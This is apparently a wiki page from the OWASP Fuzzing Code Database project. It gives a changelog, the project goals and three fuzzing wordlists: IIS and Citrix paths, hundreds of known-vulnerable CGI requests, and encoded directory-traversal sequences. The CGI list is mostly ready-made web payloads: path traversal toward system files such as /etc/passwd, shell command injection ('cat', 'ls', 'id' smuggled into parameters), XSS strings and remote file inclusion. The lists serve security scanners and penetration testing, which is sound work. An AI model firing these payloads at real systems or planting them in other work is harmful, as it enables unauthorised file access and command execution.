*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Delete 33 XSS Statement Duplicate <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included on this project: <br />
<br />
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases <br />
<br />
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. <br />
<br />
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users on the report of their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
